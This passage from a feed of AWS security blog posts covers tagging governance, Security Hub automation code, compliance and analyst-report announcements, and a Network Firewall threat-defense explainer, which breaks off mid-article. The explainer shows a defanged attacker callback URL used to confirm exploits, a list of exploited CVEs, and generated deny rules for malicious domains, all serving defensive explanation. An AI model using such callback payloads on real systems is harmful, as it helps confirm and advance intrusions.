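def required_controls(classification_tag):
    """Look up the controls required for a DataClassification tag value."""
    return CLASSIFICATION_CONTROLS[classification_tag]

print(required_controls("L1")["audit_logging"])
```

A table like this becomes the single source of truth that both provisioning templates and remediation functions read from, so the framework and its enforcement cannot drift apart.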
To help with data classification and tagging, AWS created AWS Resource Groups, a service that you can use to organize AWS resources into groups using criteria that you define as tags. If you're using multiple AWS accounts across your organization, AWS Organizations supports tag policies, which you can use to standardize the tags attached to the AWS resources in an organization's accounts. The workflow for using tagging is shown in Figure 1. For more information, see Guidance for Tagging on AWS.

Figure 1: Workflow for tagging on AWS for a multi-account environment

Your tag governance strategy

A well-designed tagging strategy is fundamental to automated governance. Tags not only help organize resources but also enable automated security controls, cost allocation, and compliance monitoring.

Figure 2: Tag governance workflow

As shown in Figure 2, tag policies use the following process:

  1. AWS validates tags when you create resources.
  2. Non-compliant resources trigger automatic remediation, while compliant resources deploy normally.
  3. Continuous monitoring catches deviations from your policies.

The following tagging strategy enables automation:

{
    "MandatoryTags": {
        "DataClassification": ["L1", "L2", "L3"],
        "DataOwner": "<Department/Team Name>",
        "Compliance": ["PCI", "SOX", "GDPR", "None"],
        "Environment": ["Prod", "Dev", "Test", "Stage"],
        "CostCenter": "<Business Unit Code>"
    },
    "OptionalTags": {
        "BackupFrequency": ["Daily", "Weekly", "Monthly"],
        "RetentionPeriod": "<Time in Months>",
        "ProjectCode": "<Project Identifier>",
        "DataResidency": "<Region/Country>"
    }
}
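As a preview of the enforcement side, a validator for this schema might look like the following sketch. The function and its structure are illustrative, not an AWS API; in practice this logic would run in a Lambda function triggered by EventBridge.

```python
# Sketch: validate a resource's tags against the mandatory-tag schema above.
# Illustrative only -- real enforcement would run in Lambda, triggered by
# EventBridge on resource creation.

MANDATORY_TAGS = {
    "DataClassification": ["L1", "L2", "L3"],
    "Compliance": ["PCI", "SOX", "GDPR", "None"],
    "Environment": ["Prod", "Dev", "Test", "Stage"],
    "DataOwner": None,   # free-form: any non-empty value is accepted
    "CostCenter": None,  # free-form: any non-empty value is accepted
}

def validate_tags(tags):
    """Return a list of violations for a {key: value} tag dict."""
    violations = []
    for key, allowed in MANDATORY_TAGS.items():
        if key not in tags or not tags[key]:
            violations.append(f"missing tag: {key}")
        elif allowed is not None and tags[key] not in allowed:
            violations.append(f"invalid value for {key}: {tags[key]}")
    return violations

tags = {"DataClassification": "L4", "DataOwner": "finance", "CostCenter": "CC-42"}
print(validate_tags(tags))
```

An empty list means the resource is compliant; anything else can drive automatic tagging, quarantine, or a ticket to the data owner.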

While AWS Organizations tag policies provide a foundation for consistent tagging, comprehensive tag governance requires additional enforcement mechanisms, which we explore in detail in Part 2.

Conclusion

This first part of the two-part series established the foundational elements of implementing data governance on AWS, covering data classification frameworks, effective tagging strategies, and organizational alignment requirements. These fundamentals serve as building blocks for scalable and automated governance approaches. Part 2 focuses on technical implementation and architectural patterns, including monitoring foundations, preventive controls, and automated remediation. The discussion extends to tag-based security controls, compliance monitoring automation, and governance integration with disaster recovery strategies. Additional topics include data sovereignty controls and machine learning model governance with Amazon SageMaker, supported by AWS implementation examples.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Omar Ahmed
Omar Ahmed is an Auto and Manufacturing Solutions Architect who specializes in analytics. Omar's journey in cloud computing began as an AWS data center operations technician, where he developed hands-on infrastructure expertise. Outside of work, he enjoys motorsports, gaming, and swimming.
Omar Mahmoud
Omar is a Solutions Architect helping small and medium businesses with their cloud journey. He specializes in Amazon Connect and next-gen developer services like Kiro. Omar began at AWS as a data center operations technician, gaining hands-on cloud infrastructure experience. Outside work, Omar enjoys gaming, hiking, and soccer.
Changil Jeong
Changil Jeong is a Solutions Architect at Amazon Web Services (AWS) partnering with independent software vendor customers on their cloud transformation journey, with strong interests in security. He joined AWS as an SDE apprentice before transitioning to SA. He previously served in the U.S. Army as a financial and budgeting analyst and worked at a large IT consulting firm as a SaaS security analyst.
Paige Broderick
Paige Broderick is a Solutions Architect at Amazon Web Services (AWS) who works with enterprise customers to help them achieve their AWS objectives. She specializes in cloud operations, focusing on governance and using AWS to develop smart manufacturing solutions. Outside of work, Paige is an avid runner and is likely training for her next marathon.

Streamline security response at scale with AWS Security Hub automation

13 January 2026 at 18:45

A new version of AWS Security Hub is now generally available, introducing new ways for organizations to manage and respond to security findings. The enhanced Security Hub helps you improve your organization's security posture and simplify cloud security operations by centralizing security management across your Amazon Web Services (AWS) environment. The new Security Hub transforms how organizations handle security findings through advanced automation capabilities, with real-time risk analytics, automated correlation, and enriched context that you can use to prioritize critical issues and reduce response times. Automation also helps ensure consistent response procedures and helps you meet compliance requirements.

AWS Security Hub CSPM (cloud security posture management) is now an integral part of the detection engines for Security Hub. Security Hub provides centralized visibility across multiple AWS security services to give you a unified view of your cloud environment, including risk-based prioritization views, attack path visualization, and trend analytics that help you understand security patterns over time.

This is the third post in our series on the new Security Hub capabilities. In our first post, we discussed how Security Hub unifies findings across AWS services to streamline risk management. In the second post, we shared the steps to conduct a successful Security Hub proof of concept (PoC).

In this post, we explore how you can enhance your security operations using AWS Security Hub automation rules and response automation.

We walk through the setup and configuration of automation rules, share best practices for creating effective response workflows, and provide real-world examples of how these tools can be used to automate remediation, escalate high-severity findings, and support compliance requirements.

Security Hub automation enables automatic responses to security findings, helping ensure critical findings reach the right teams quickly. This reduces manual effort and response time for common security incidents while maintaining consistent remediation processes.

Note: Automation rules evaluate new and updated findings that Security Hub generates or ingests after you create them, not historical findings. These automation capabilities help ensure critical findings reach the right teams quickly.

Why automation matters in cloud security

Organizations often operate across hundreds of AWS accounts, multiple AWS Regions, and diverse services, each producing findings that must be triaged, investigated, and acted upon. Without automation, security teams face high volumes of alerts, duplication of effort, and the risk of delayed responses to critical issues.

Manual processes can't keep pace with cloud operations; automation helps solve this by changing your security operations in three ways. Automation filters and prioritizes findings based on your criteria, showing your team only relevant alerts. When issues are detected, automated responses trigger immediately, with no manual intervention needed.

If you're managing multiple AWS accounts, automation applies consistent policies and workflows across your environment through centralized management, shifting your security team from chasing alerts to proactively managing risk before issues escalate.

Designing routing strategies for security findings

With Security Hub configured, you're ready to design a routing strategy for your findings and notifications. When designing your routing strategy, ask whether your existing Security Hub configuration meets your security requirements. Consider whether Security Hub automations can help you meet security framework requirements like NIST 800-53, and identify KPIs and metrics to measure whether your routing strategy works.

Security Hub automation rules and automated responses can help you meet the preceding requirements; however, it's important to understand how your compliance teams, incident responders, security operations personnel, and other security stakeholders operate on a day-to-day basis. For example, do teams use the AWS Management Console for AWS Security Hub regularly? Or do you need to send most findings downstream to an IT service management (ITSM) tool (such as Jira or ServiceNow) or third-party security orchestration, automation, and response (SOAR) platforms for incident tracking, workflow management, and remediation?

Next, create and maintain an inventory of critical applications. This helps you adjust finding severity based on business context and your incident response playbooks.

Consider the scenario where Security Hub identifies a medium-severity vulnerability on an Amazon Elastic Compute Cloud (Amazon EC2) instance. In isolation, this might not trigger immediate action. When you add business context, such as strategic objectives or business criticality, you might discover that this instance hosts a critical payment processing application, revealing the true risk. By implementing Security Hub automation rules with enriched context, this finding can be upgraded to critical severity and automatically routed to ServiceNow for immediate tracking. In addition, by using Security Hub automation with Amazon EventBridge, you can trigger an AWS Systems Manager Automation document to isolate the EC2 instance so that security forensics work can then be carried out.

Because Security Hub supports the Open Cybersecurity Schema Framework (OCSF) format and schema, you can use the extensive schema elements that OCSF offers to target findings for automation and help your organization meet security strategy requirements.

Example use cases

Security Hub automation supports many use cases. Talk with your teams to understand which fit your needs and security objectives. The following are some examples of how you can use Security Hub automation:

Automated finding remediation

Use automated finding remediation to automatically fix security issues as they’re detected.

Supporting patterns:

  • Direct remediation: Trigger AWS Lambda functions to fix misconfigurations
  • Resource tagging: Add tags to non-compliant resources for tracking
  • Configuration correction: Update resource configurations to match security policies
  • Permission adjustment: Modify AWS Identity and Access Management (IAM) policies to remove excessive permissions

Example:

  • IF finding.type = "Software and Configuration Checks/Industry and Regulatory Standards/CIS AWS Foundations Benchmark"
  • AND finding.title CONTAINS "S3 buckets should have server-side encryption enabled"
  • THEN invoke Lambda function "enable-s3-encryption"
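A remediation function like the hypothetical "enable-s3-encryption" target above might look like the following sketch. The finding-parsing helper is illustrative, and the `put_bucket_encryption` call assumes the function's execution role has permission to modify S3 bucket encryption.

```python
# Sketch of a remediation Lambda for the hypothetical "enable-s3-encryption"
# target above. The bucket-extraction helper is illustrative; the boto3 call
# assumes the execution role can modify S3 bucket encryption settings.

def bucket_from_finding(finding):
    """Pull the S3 bucket name out of a Security Hub finding's resources."""
    for resource in finding.get("Resources", []):
        if resource.get("Type") == "AwsS3Bucket":
            # The resource Id is the bucket ARN, e.g. arn:aws:s3:::my-bucket
            return resource["Id"].split(":::")[-1]
    return None

def lambda_handler(event, context):
    # EventBridge delivers Security Hub findings under detail.findings
    import boto3  # imported here so the helper above is testable without boto3

    finding = event["detail"]["findings"][0]
    bucket = bucket_from_finding(finding)
    if bucket is None:
        return {"status": "skipped", "reason": "no S3 bucket in finding"}

    s3 = boto3.client("s3")
    s3.put_bucket_encryption(
        Bucket=bucket,
        ServerSideEncryptionConfiguration={
            "Rules": [{"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "AES256"}}]
        },
    )
    return {"status": "remediated", "bucket": bucket}
```

The handler returns a small status dict, which makes the outcome easy to log or forward to a compliance-evidence bucket.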

Security finding workflow integration

Integrate findings into your workflow by routing them to the appropriate teams and systems.

Supporting patterns:

  • Ticket creation: Generate JIRA or ServiceNow tickets for manual review
  • Team assignment: Route findings to specific teams based on resource ownership
  • Severity-based routing: Direct critical findings to incident response, others to regular queues
  • Compliance tracking: Send compliance-related findings to GRC systems

Example:

  • IF finding.severity = "CRITICAL" AND finding.productName = "Amazon GuardDuty"
  • THEN send to SNS topic "security-incident-response-team"
  • ELSE IF finding.productFields.resourceOwner = "payments-team"
  • THEN send to SNS topic "payments-security-review"
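The routing example above reduces to a small decision function. This is a sketch; the topic names are the hypothetical ones from the example, not real resources.

```python
# Sketch: the routing example above as a decision function. The SNS topic
# names are the hypothetical ones from the example.

def route_finding(finding):
    """Return the SNS topic a finding should be published to, or None."""
    if finding.get("severity") == "CRITICAL" and finding.get("productName") == "Amazon GuardDuty":
        return "security-incident-response-team"
    if finding.get("productFields", {}).get("resourceOwner") == "payments-team":
        return "payments-security-review"
    return None

finding = {"severity": "CRITICAL", "productName": "Amazon GuardDuty"}
print(route_finding(finding))  # -> security-incident-response-team
```

Keeping the routing logic in one pure function like this makes it straightforward to unit test before wiring it to SNS.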

Automated finding enrichment

Use finding enrichment to add context that improves triage efficiency.

Supporting patterns:

  • Resource context addition: Add business context, owner information, and data classification
  • Historical analysis: Add information about previous similar findings
  • Risk scoring: Calculate custom risk scores based on asset value and threat context
  • Vulnerability correlation: Link findings to known Common Vulnerabilities and Exposures (CVEs) or threat intelligence

Example:

  • IF finding.type CONTAINS "Vulnerability/CVE"
  • THEN invoke Lambda function "enrich-with-threat-intelligence"

Custom security controls

Use custom security controls to meet organization-specific security requirements.

Supporting patterns:

  • Custom policy enforcement: Check for compliance with internal standards
  • Business-specific rules: Apply rules based on business unit or application type
  • Compensating controls: Implement alternatives when primary controls can't be applied
  • Temporary exceptions: Handle approved deviations from security standards

Example:

  • IF finding.resourceType = "AWS::EC2::Instance" AND
    • finding.resourceTags.Environment = "Production" AND
    • finding.title CONTAINS "vulnerable software version"
  • THEN invoke Lambda function "enforce-patching-policy"

Compliance reporting and evidence collection

Streamline compliance documentation and evidence gathering.

Supporting patterns:

  • Evidence capture: Store compliance evidence in designated S3 buckets
  • Audit trail creation: Document remediation actions for auditors
  • Compliance dashboarding: Update compliance status metrics
  • Regulatory mapping: Tag findings with relevant compliance frameworks

Example:

  • IF finding.complianceStandards CONTAINS "PCI-DSS"
  • THEN invoke Lambda function "capture-pci-compliance-evidence"
  • AND send to SNS topic "compliance-team-notifications"

Set up Security Hub automation

In this section, you'll walk through enabling Security Hub and related services and creating automation rules.

Step 1: Enable Security Hub and integrated services

As the first step, follow the instructions in Enable Security Hub.

Note: Security Hub is powered by Amazon GuardDuty, Amazon Inspector, AWS Security Hub CSPM, and Amazon Macie, and these services also need to be enabled to get value from Security Hub.

Step 2: Create automation rules to update finding details and third-party integration

After Security Hub collects findings, you can create automation rules to update and route the findings to the appropriate teams. The steps to create automation rules that update finding details or set up a third-party integration (such as Jira or ServiceNow) based on criteria you define can be found in Creating automation rules in Security Hub.

With automation rules, Security Hub evaluates findings against the defined rule and then makes the appropriate finding update or calls the APIs to send findings to Jira or ServiceNow. Security Hub sends a copy of every finding to Amazon EventBridge so that you can also implement your own automated response (if needed) for use cases outside of using Security Hub automation rules.

In addition to sending a copy of every finding to EventBridge, Security Hub classifies and enriches security findings according to business context, then delivers them to the appropriate downstream services (such as ITSM tools) for fast response.
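For custom responses outside of automation rules, an EventBridge rule can match the finding copies that Security Hub emits. The sketch below builds such an event pattern; "Security Hub Findings - Imported" is the detail-type Security Hub uses for these events, and the severity filter is an illustrative addition that narrows matches to high-severity findings.

```python
# Sketch: an EventBridge event pattern that matches high-severity Security Hub
# findings. "Security Hub Findings - Imported" is the detail-type Security Hub
# emits; the severity filter is an illustrative narrowing.
import json

event_pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Imported"],
    "detail": {
        "findings": {
            "Severity": {"Label": ["HIGH", "CRITICAL"]}
        }
    },
}

# This JSON would be supplied as the EventPattern of an EventBridge rule,
# whose target could be a Lambda function or an SNS topic.
print(json.dumps(event_pattern, indent=2))
```

Pairing a pattern like this with a Lambda or SNS target gives you a response path that runs after any automation rules have updated the finding.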

Best practices

AWS Security Hub automation rules offer capabilities for automatically updating findings and integrating with other tools. When implementing automation rules, follow these best practices:

  • Centralized management: Only the Security Hub administrator account can create, edit, delete, and view automation rules. Ensure proper access control and management of this account.
  • Regional deployment: Automation rules can be created in one AWS Region and then applied across configured Regions. When using Region aggregation, you can only create rules in the home Region. If you create an automation rule in an aggregation Region, it will be applied in all included Regions. If you create an automation rule in a non-linked Region, it will be applied only in that Region. For more information, see Creating automation rules in Security Hub.
  • Define specific criteria: Clearly define the criteria that findings must match for the automation rule to apply. This can include finding attributes, severity levels, resource types, or member account IDs.
  • Understand rule order: Rule order matters when multiple rules apply to the same finding or finding field. Security Hub applies rules with a lower numerical value first. If multiple findings have the same RuleOrder, Security Hub applies a rule with an earlier value for the UpdatedAt field first (that is, the rule which was most recently edited applies last). For more information, see Updating the rule order in Security Hub.
  • Provide clear descriptions: Include a detailed rule description to provide context for responders and resource owners, explaining the rule’s purpose and expected actions.
  • Use automation for efficiency: Use automation rules to automatically update finding fields (such as severity and workflow status), suppress low-priority findings, or create tickets in third-party tools such as Jira or ServiceNow for findings matching specific attributes.
  • Consider EventBridge for external actions: While automation rules handle internal Security Hub finding updates, use EventBridge rules to trigger actions outside of Security Hub, such as invoking Lambda functions or sending notifications to Amazon Simple Notification Service (Amazon SNS) topics based on specific findings. Automation rules take effect before EventBridge rules are applied. For more information, see Automation rules in EventBridge.
  • Manage rule limits: There is a maximum limit of 100 automation rules per administrator account. Plan your rule creation strategically to stay within this limit.
  • Regularly review and refine: Periodically review automation rules, especially suppression rules, to ensure they remain relevant and effective, adjusting them as your security posture evolves.
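The rule-order semantics described above can be modeled as a simple sort: ascending RuleOrder, with ties broken by earlier UpdatedAt first (so the most recently edited rule applies last). The rule data in this sketch is hypothetical.

```python
# Sketch: model Security Hub's rule-application order -- lower RuleOrder
# first, ties broken by earlier UpdatedAt. Rule data here is hypothetical.
from datetime import datetime

rules = [
    {"RuleName": "suppress-dev-findings", "RuleOrder": 10,
     "UpdatedAt": datetime(2025, 6, 1)},
    {"RuleName": "escalate-prod-criticals", "RuleOrder": 5,
     "UpdatedAt": datetime(2025, 7, 15)},
    {"RuleName": "tag-payments-findings", "RuleOrder": 10,
     "UpdatedAt": datetime(2025, 3, 20)},
]

application_order = sorted(rules, key=lambda r: (r["RuleOrder"], r["UpdatedAt"]))
print([r["RuleName"] for r in application_order])
# The order-5 rule applies first; of the two order-10 rules, the
# earlier-edited one applies first.
```

Modeling the ordering this way is a quick sanity check before you rely on one rule overwriting another's field updates.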

Conclusion

You can use Security Hub automation to triage, route, and respond to findings faster through a unified cloud security solution with centralized management. In this post, you learned how to create automation rules that route findings to ticketing system integrations and upgrade critical findings for immediate response. Through the intuitive and flexible approach to automation that Security Hub provides, your security teams can make confident, data-driven decisions about Security Hub findings that align with your organization's overall security strategy.

With Security Hub automation features, you can centrally manage security across hundreds of accounts while your teams focus on critical issues that matter most to your business. By implementing the automation capabilities described in this post, you can streamline response times at scale, reduce manual effort, and improve your overall security posture through consistent, automated workflows.

If you have feedback about this post, submit comments in the Comments section. If you have questions about this post, start a new thread on AWS Security, Identity, and Compliance re:Post or contact AWS Support.

Ahmed Adekunle
Ahmed is a Security Specialist Solutions Architect focused on detection and response services at AWS. Before AWS, his background was in business process management and AWS technology consulting, helping customers use cloud technology to transform their business. Outside of work, Ahmed enjoys playing soccer, supporting less privileged activities, traveling, and eating spicy food, specifically African cuisine.
Alex Waddell
Alex is a Senior Security Specialist Solutions Architect at AWS based in Scotland. Alex provides security architectural guidance and operational best practices to customers of all sizes, helping them implement AWS security services. When not working, Alex enjoys spending time sampling rum from around the world, walking his dogs in the local forest trails, and traveling.
Kyle Shields
Kyle is a WW Security Specialist Solutions Architect at AWS focused on threat detection and incident response. With over 10 years in cybersecurity and more than 20 years of Army service, he helps customers build effective incident response capabilities while implementing information and cyber security best practices.

Fall 2025 PCI DSS compliance package available now

13 January 2026 at 02:06

Amazon Web Services (AWS) is pleased to announce that two additional AWS services and one additional AWS Region have been added to the scope of our Payment Card Industry Data Security Standard (PCI DSS) certification:

Newly added services:

Newly added AWS Region:

  • Asia Pacific (Taipei)

This certification allows customers to use these services while maintaining PCI DSS compliance, enabling innovation without compromising security. The full list of services can be found on the AWS Services in Scope by Compliance Program page. The PCI DSS compliance package includes two key components:

  • Attestation of Compliance (AOC), demonstrating that AWS was successfully validated against the PCI DSS standard.
  • AWS Responsibility Summary, which provides guidance to help AWS customers understand their responsibility in developing and operating a highly secure environment on AWS for handling payment card data.

AWS was evaluated by Coalfire, a third-party Qualified Security Assessor (QSA).

This refreshed PCI certification offers customers greater flexibility in deploying regulated workloads while reducing compliance overhead. Customers can access the PCI DSS certification through AWS Artifact. This self-service portal provides on-demand access to AWS compliance reports, streamlining audit processes.

AWS is excited to be the first cloud service provider to offer compliance reports to customers in NIST's Open Security Controls Assessment Language (OSCAL), an open source, machine-readable (JSON) format for security information. The PCI DSS report package (which includes both the PCI DSS AOC and the AWS Responsibility Summary) in OSCAL format is now available separately in AWS Artifact, marking a milestone towards open, standards-based compliance automation. This machine-readable version of the PCI DSS report package enables workflow automation to reduce manual processing time and modernize security and compliance processes. We want to hear about your innovative use cases for this content; reach out through the contact information found in the OSCAL report package.

To learn more about our PCI programs and other compliance and security programs, see the AWS Compliance Programs page. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Compliance Support page.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Tushar Jain
Tushar is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Tushar holds a Master of Business Administration from the Indian Institute of Management Shillong, India, and a Bachelor of Technology in electronics and telecommunication engineering from Marathwada University, India. He has over 13 years of experience in information security and holds CISM, CCSK, and CSXF certifications.
Will Black
Will is a Compliance Program Manager at AWS where he leads multiple security and compliance initiatives. Will has 10 years of experience in compliance and security assurance and holds a degree in Management Information Systems from Temple University. Additionally, he is a PCI Internal Security Assessor (ISA) for AWS and holds the CCSK and ISO 27001 Lead Implementer certifications.
Fritz Kunstler
Fritz is a Principal Security Engineer at AWS, currently focused on AI applications to transform security governance, risk, and compliance. Fritz has been an AWS customer since 2008 and an Amazonian since 2016.
Brian Ruf
Brian is co-creator of the Open Security Controls Assessment Language (OSCAL). He is an independent consultant at AWS providing modeling and advisory services to ensure accurate and compliant OSCAL generation. Brian has a Bachelor of Information Science from Stockton University. He has 35 years of experience in information technology, including 25 years in cybersecurity, data modeling, and process improvement/automation experience and holds CISSP, CCSP and PMP certifications.

AWS named Leader in the 2025 ISG report for Sovereign Cloud Infrastructure Services (EU)

9 January 2026 at 17:11

For the third year in a row, Amazon Web Services (AWS) is named as a Leader in the Information Services Group (ISG) Provider Lens™ Quadrant report for Sovereign Cloud Infrastructure Services (EU), published on January 9, 2026. ISG is a leading global technology research, analyst, and advisory firm that serves as a trusted business partner to more than 900 clients. This ISG report evaluates 19 providers of sovereign cloud infrastructure services in the multi-public-cloud environment and examines how they address the key challenges that enterprise clients face in the European Union (EU). ISG defines Leaders as providers who represent innovative strength and competitive stability.

ISG rated AWS ahead of other leading cloud providers on both the competitive strength and portfolio attractiveness axes, with the highest score on portfolio attractiveness. Competitive strength was assessed on multiple factors, including degree of awareness, core competencies, and go-to-market strategy. Portfolio attractiveness was assessed on multiple factors, including scope of portfolio, portfolio quality, strategy and vision, and local characteristics.

According to ISG, "AWS's infrastructure provides robust resilience and availability, supported by a sovereign-by-design architecture that ensures data residency and regional independence."

Read the report to:

  • Discover why AWS was named as a Leader with the highest score on portfolio attractiveness by ISG.
  • Gain further understanding on how the AWS Cloud is sovereign-by-design and how it continues to offer more control and more choice without compromising on the full power of AWS.
  • Learn how AWS is delivering on its Digital Sovereignty Pledge and is investing in an ambitious roadmap of capabilities for data residency, granular access restriction, encryption, and resilience.

AWS's recognition as a Leader in this report for the third consecutive year underscores our commitment to helping European customers and partners meet their digital sovereignty and resilience requirements. We are building on the strong foundation of security and resilience that has underpinned AWS services, including our long-standing commitment to customer control over data residency, our design principle of strong regional isolation, our deep European engineering roots, and our more than a decade of experience operating multiple independent clouds for the most critical and restricted workloads.

Download the full 2025 ISG Provider Lens Quadrant report for Sovereign Cloud Infrastructure Services (EU).

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Brittany Bunch
Brittany is a Product Marketing Manager on the AWS Security Marketing team based in Atlanta. She focuses on digital sovereignty and brings over a decade of experience in brand marketing, including employer branding at Amazon. Prior to AWS, she led brand marketing initiatives at several large enterprise companies.

Real-time malware defense: Leveraging AWS Network Firewall active threat defense

8 January 2026 at 17:01

Cyber threats are evolving faster than traditional security defenses can respond; workloads with potential security issues are discovered by threat actors within 90 seconds, with exploitation attempts beginning within 3 minutes. Threat actors are quickly evolving their attack methodologies, resulting in new malware variants, exploit techniques, and evasion tactics. They also rotate their infrastructure: IP addresses, domains, and URLs. Effectively defending your workloads requires quickly translating threat data into protective measures, which can be challenging when operating at internet scale. This post describes how AWS active threat defense for AWS Network Firewall can help detect and block these threats to protect your cloud workloads.

Active threat defense detects and blocks network threats by drawing on real-time intelligence gathered through MadPot, the network of honeypot sensors used by Amazon to actively monitor attack patterns. Active threat defense rules treat speed as a foundational tenet, not an aspiration. When threat actors create a new domain to host malware or set up fresh command-and-control servers, MadPot sees them in action. Within 30 minutes of receiving new intelligence from MadPot, active threat defense automatically translates that intelligence into threat detection through Amazon GuardDuty and active protection through AWS Network Firewall.

Speed alone isn't enough without applying the right threat indicators to the right mitigation controls. Active threat defense disrupts attacks at every stage: it blocks reconnaissance scans, prevents malware downloads, and severs command-and-control communications between compromised systems and their operators. The result is a multi-layered defense that can disrupt attacks even when they bypass some of the layers.

How active threat defense works

MadPot honeypots mimic cloud servers, databases, and web applications, complete with the misconfigurations and security gaps that threat actors actively hunt for. When threat actors take the bait and launch their attacks, MadPot captures the complete attack lifecycle against these honeypots, mapping the threat actor infrastructure, capturing emerging attack techniques, and identifying novel threat patterns. Based on observations in MadPot, we also identify infrastructure with similar fingerprints through wider scans of the internet.

Figure 1: Overview of active threat defense integration

Figure 1 shows how this works. When threat actors deliver malware payloads to MadPot honeypots, AWS executes the malicious code in isolated environments, extracting indicators of compromise from the malware's behavior: the domains it contacts, the files it drops, the protocols it abuses. This threat intelligence feeds active threat defense's automated protection: active threat defense validates indicators, converts them to firewall rules, tests for performance impact, and deploys them globally to Network Firewall, all within 30 minutes. And because threats evolve, active threat defense monitors changes in threat actor infrastructure, automatically updating protection rules as threat actors rotate domains, shift IP addresses, or modify their tactics.

Figure 2: Swiss cheese model

Active threat defense uses the Swiss cheese model of defense (shown in Figure 2), a principle recognizing that no single security control is perfect, but multiple imperfect layers create robust protection when stacked together. Each defensive layer has gaps: threat actors can bypass DNS filtering with direct IP connections, encrypted traffic defeats HTTP inspection, and domain fronting or IP-only connections evade TLS SNI analysis. Active threat defense applies threat indicators across multiple inspection points, so if threat actors bypass one layer, other layers can still detect and block them. When MadPot identifies a malicious domain, Network Firewall doesn't only block the domain; it also creates rules that deny DNS queries, block HTTP host headers, prevent TLS connections using SNI, and drop direct connections to the resolved IP addresses. Like slices of Swiss cheese stacked together, the holes rarely align, and active threat defense reduces the likelihood of threat actors finding a complete path to their target.
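Network Firewall stateful rules use Suricata-compatible syntax, so the layered approach can be sketched as generating one deny rule per inspection point for the same indicator. The sketch below is illustrative only: the domain, IP address, and SIDs are hypothetical, and the actual active threat defense managed rules are maintained by AWS and not published.

```python
# Illustrative sketch: emit Suricata-compatible deny rules that cover one
# malicious domain at the DNS, HTTP, TLS, and IP layers. All values are
# hypothetical; real active threat defense rules are AWS-managed.
def layered_rules(domain, resolved_ips, sid_base):
    rules = [
        # DNS layer: deny resolution of the malicious domain.
        f'drop dns $HOME_NET any -> any any (msg:"deny DNS {domain}"; '
        f'dns.query; content:"{domain}"; nocase; sid:{sid_base}; rev:1;)',
        # HTTP layer: deny plaintext requests with a matching Host header.
        f'drop http $HOME_NET any -> any any (msg:"deny HTTP host {domain}"; '
        f'http.host; content:"{domain}"; nocase; sid:{sid_base + 1}; rev:1;)',
        # TLS layer: deny connections by SNI, without decrypting traffic.
        f'drop tls $HOME_NET any -> any any (msg:"deny TLS SNI {domain}"; '
        f'tls.sni; content:"{domain}"; nocase; sid:{sid_base + 2}; rev:1;)',
    ]
    # IP layer: deny direct connections to each resolved address.
    for offset, ip in enumerate(resolved_ips, start=3):
        rules.append(
            f'drop ip $HOME_NET any -> {ip} any '
            f'(msg:"deny IP {ip}"; sid:{sid_base + offset}; rev:1;)'
        )
    return rules

rules = layered_rules("malicious-callback.com", ["198.51.100.7"], 1000001)
```

If one layer is bypassed (for example, the client connects by IP and never issues a DNS query), the other rules still apply, which is the Swiss cheese property in rule form.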

Disrupting the attack kill chain with active threat defense

Let's look at how active threat defense disrupts threat actors across the entire attack lifecycle with this Swiss cheese approach. Figure 3 illustrates an example attack methodology, described in the following sections, that threat actors use to compromise targets and establish persistent control for malicious activities. Modern attacks require network communications at every stage, and that's precisely where active threat defense creates multiple layers of defense. This attack flow demonstrates the importance of network-layer security controls that can intercept and block malicious communications at each stage, preventing successful compromise even when initial vulnerabilities exist.

Figure 3: An example flow of an attack scenario using an OAST technique

Step 0: Infrastructure preparation

Before launching attacks, threat actors provision their operational infrastructure. For example, this includes setting up an out-of-band application security testing (OAST) callback endpoint, a reconnaissance technique that threat actors use to verify successful exploitation through separate communication channels. They also provision malware distribution servers hosting the payloads that will infect victims, and command-and-control (C2) servers to manage compromised systems. MadPot honeypots detect this infrastructure when threat actors use it against decoy systems, feeding those indicators into active threat defense protection rules.

Step 1: Target identification

Threat actors compile lists of potential victims through automated internet scanning or by purchasing target lists from underground markets. They're looking for workloads running vulnerable software, exposed services, or common misconfigurations. The MadPot honeypot system experiences more than 750 million such interactions with potential threat actors every day, and new MadPot sensors are discovered within 90 seconds; this visibility reveals patterns that would otherwise go unnoticed. Active threat defense doesn't stop reconnaissance, but it uses MadPot's visibility to disrupt later stages.

Step 2: Vulnerability confirmation

The threat actor attempts to verify a vulnerability in the target workload, embedding an OAST callback mechanism within the exploit payload. This might take the form of a malicious URL like http://malicious-callback[.]com/verify?target=victim injected into web forms, HTTP headers, API parameters, or other input fields. Some threat actors use OAST domain names that are also used by legitimate security scanners, while others use more custom domains to evade detection. The following table lists example vulnerabilities that threat actors tried to exploit against MadPot using OAST links over the past 90 days.

CVE ID Vulnerability name
CVE-2017-10271 Oracle WebLogic Server deserialization remote code execution (RCE)
CVE-2017-11610 Supervisor XML-RPC authentication bypass
CVE-2020-14882 Oracle WebLogic Server console RCE
CVE-2021-33690 SAP NetWeaver server side request forgery (SSRF)
CVE-2021-44228 Apache Log4j2 RCE
CVE-2022-22947 VMware Spring Cloud gateway RCE
CVE-2022-22963 VMware Tanzu Spring Cloud function RCE
CVE-2022-26134 Atlassian Confluence Server and Data Center RCE
CVE-2023-22527 Atlassian Confluence Data Center and Server template injection vulnerability
CVE-2023-43208 NextGen Healthcare Mirth connect RCE
CVE-2023-46805 Ivanti Connect Secure and Policy Secure authentication bypass vulnerability
CVE-2024-13160 Ivanti Endpoint Manager (EPM) absolute path traversal vulnerability
CVE-2024-21893 Ivanti Connect Secure, Policy Secure, and Neurons server-side request forgery (SSRF) vulnerability
CVE-2024-36401 OSGeo GeoServer GeoTools eval injection vulnerability
CVE-2024-37032 Ollama API server path traversal
CVE-2024-51568 CyberPanel RCE
CVE-2024-8883 Keycloak redirect URI validation vulnerability
CVE-2025-34028 Commvault Command Center path traversal vulnerability

Step 3: OAST callback

When vulnerable workloads process these malicious payloads, they attempt to initiate callback connections to the threat actor's OAST monitoring servers. These callback signals would normally provide the threat actor with confirmation of successful exploitation, along with intelligence about the compromised workload, vulnerability type, and potential attack progression pathways. Active threat defense breaks the attack chain at this point. MadPot identifies the malicious domain or IP address and adds it to the active threat defense deny list. When the vulnerable target attempts to execute the network call to the threat actor's OAST endpoint, Network Firewall with active threat defense enabled blocks the outbound connection. The exploit might succeed, but without confirmation, the threat actor can't identify which targets to pursue, stalling the attack.

Step 4: Malware delivery preparation

